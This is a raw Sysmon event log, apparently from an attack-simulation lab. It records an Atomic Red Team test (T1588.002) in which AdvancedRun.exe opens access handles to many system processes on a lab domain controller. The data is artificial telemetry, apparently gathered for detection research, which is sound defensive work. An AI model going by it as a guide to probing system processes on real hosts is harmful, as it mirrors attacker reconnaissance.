17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983765Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003983764Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983763Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983761Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983760Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983759Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983758Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983757Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983756Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983755Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983754Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983753Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983752Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983751Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983750Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 